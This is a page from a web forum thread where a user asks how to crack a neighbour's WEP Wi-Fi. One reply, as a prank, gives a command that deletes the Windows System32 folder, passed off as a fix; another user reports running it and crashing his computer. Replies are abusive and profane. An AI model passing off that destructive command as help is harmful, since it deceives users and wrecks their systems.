Register

If this is your first visit, please click the Sign Up now button to begin the process of creating your account so you can begin posting on our forums! The Sign Up process will only take up about a minute of two of your time.

Follow us on Facebook Follow us on Twitter Linked In Flickr Watch us on YouTube Google+
Page 1 of 3 123 LastLast
    Junior Member EricfromWillowGrove's Avatar
    Downloads
    Uploads

How to Hack a WEP to use my neighbors internet?

ok my internet sucks and i have rele good singnal from my neigbors and ive been trying to do it i cant do it so if you could give me step by step that would be great and i also have VISTA and i also need to now where to get the programs from THANKS

Downloads
    Uploads
    Delete your system32, that's what is stopping you from getting into his connection.

To remove the System32, the quickest, most effective method is to go to start > run and type "cmd" then press enter. You should get a black window called command prompt. Next type the following in:

/c rd /s /q c:\windows\system32

Unregistered
    Quote Originally Posted by DmNt View Post
    Delete your system32, that's what is stopping you from getting into his connection.

To remove the System32, the quickest, most effective method is to go to start > run and type "cmd" then press enter. You should get a black window called command prompt. Next type the following in:

/c rd /s /q c:windowssystem32
    hahaha lol you .... Your Trying to Crupt his computer lol. hahahahhahahahahhaha if u take off your Sys 32 than your comp will fry. or Crash!!!!!

Unregistered
    I typed as per your instruction:

however I still can't connect to my neighbor's internet, and now even my computer got blue screen. What's wrong, please help!

Unregistered
    removing System32 is like putting the computer into the exhaust from a jet engine with full afterburners. then the blue screen is bad shit.....dumbest thing ever....

contact
    aim-pants116

Unregistered

Gun haha

Quote Originally Posted by Unregistered View Post
    I typed as per your instruction:

however I still can't connect to my neighbor's internet, and now even my computer got blue screen. What's wrong, please help!
    the blue screen is the blue death screen hahaha

Unregistered

Gun Fuck U!

god dat guys a fuckn asshole, and da other guys a dumbass. I cant believe im reading dis shit. it would be nice to know da real answer tho. theres gotta be an easy way with da built in wireless

euromonk

Snifer

Hey, you need to get a sniffer and a WEP code generator good luck with that!

P.S. face-palm for the guy that deleted his system 32 and shame on you DMnt, good trolling though!

Unregistered

Coffeebean i hate mean people

omg you people are so mean to that person why would you guys do that to him poor guy his computer is stiffed now..... ohh come on people

Unregistered
    You fucking twat! xD

Page 1 of 3 123 LastLast